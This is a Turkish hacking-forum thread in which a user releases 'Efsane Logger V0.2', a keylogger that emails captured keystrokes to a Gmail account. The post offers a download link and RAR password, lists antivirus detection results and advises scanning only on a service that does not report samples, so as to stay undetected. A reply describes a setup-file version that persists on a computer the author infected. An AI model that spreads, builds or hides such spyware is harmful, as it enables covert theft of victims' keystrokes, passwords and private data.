Efsane Logger V0.2

efsane4242

Uzman üye
30 Ocak 2013
1,039
0
32
Konya
Merhaba Arkadaşlar V1'deki özelliklerin aynısı mevcut işlemciyi yormaz ancak Konsol olarak yazdım ve CodeDom Yaptım yani artık sizin belirttiginiz mail adresi 'ne belirttiginiz süre' de mail yollayacak mail içerigi biraz daha bicimsiz oldu ancak idare eder log tutmada hic bir sıkıntı yaratmıyor Sadece Gmail üzerinden alım var simdilik ileride diger mail türlerinide ekleyecegim. Vürüs totalde olusturdugumuz Logger dosyasını tarattıgımda önemli vürüs programlarından kaçtıgını gördüm dilerseniz sizde taratın ancak su sitede taratın rapor gitmesin :
VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 41 AntiVirus Engines!

Programın NetReflektör Sonrası taraması : Efsane Logger.exe MD5:953e343651ebaed91029625293a73ec7 11% Scanner(s) (5/45) found malware! - VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 41 AntiVirus Engines!
NetReflektör Öncesi taraması : Efsane Logger.exe MD5:11944bcba1931af6be4d37bac4eb5e1b 2% Scanner(s) (1/45) found malware! - VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 41 AntiVirus Engines!
Server Tarama Sonucu : SERVER.exe MD5:041253d4b8341f8cbe4b4e8a7f3c6c2c 15% Scanner(s) (7/45) found malware! - VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 41 AntiVirus Engines!

Vürüs Total : https://www.virustotal.com/#/file/2...848b16ac19cd2f35148bf790f2d0ef2a8a6/detection

Program indirme Linki : https://drive.google.com/file/d/1p6v0O-wrWwclOGTEgMhTxQPxM0xVqKSv/view?usp=sharing

RAR PAS : Ottoman1453

Deneyen arkadaşlar görüşlerini paylaşırsa sevinirim arkadaşlar daha glişecek bu ilerleyen zamanlarda insAllah sizin görüş tavsiyeleriniz önemli.

Son düzenleme:

efsane4242

Uzman üye
30 Ocak 2013
1,039
0
32
Konya
hocam c# bilgin varsa v0.1 e bak ve bir setup dosyasi yap omur boyu gider ben bir bilgisayara attim 2 dk ayarlamistim maili ama icerisine kayit yoksa yollama ozelligi eklememistim 2 dk da bir bos mail atip durdu ve o yuzden maili kapattim yani kaliciligi cok iyi olsun diyorsan v0.1 i öneririm setup olduu icin yakalanmior ben hala kullaniyorum

1 hafta idare eder mi yoksa serverlar çöküyor mu?

hic denemedim bunu yaptim mantigi digerinin aynisi 5 6 saat ugrastim oldu ama patlarmi patlamazmi bisey diyemem al dene pc kapat ac gelmeye devam.ediyomu bak

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.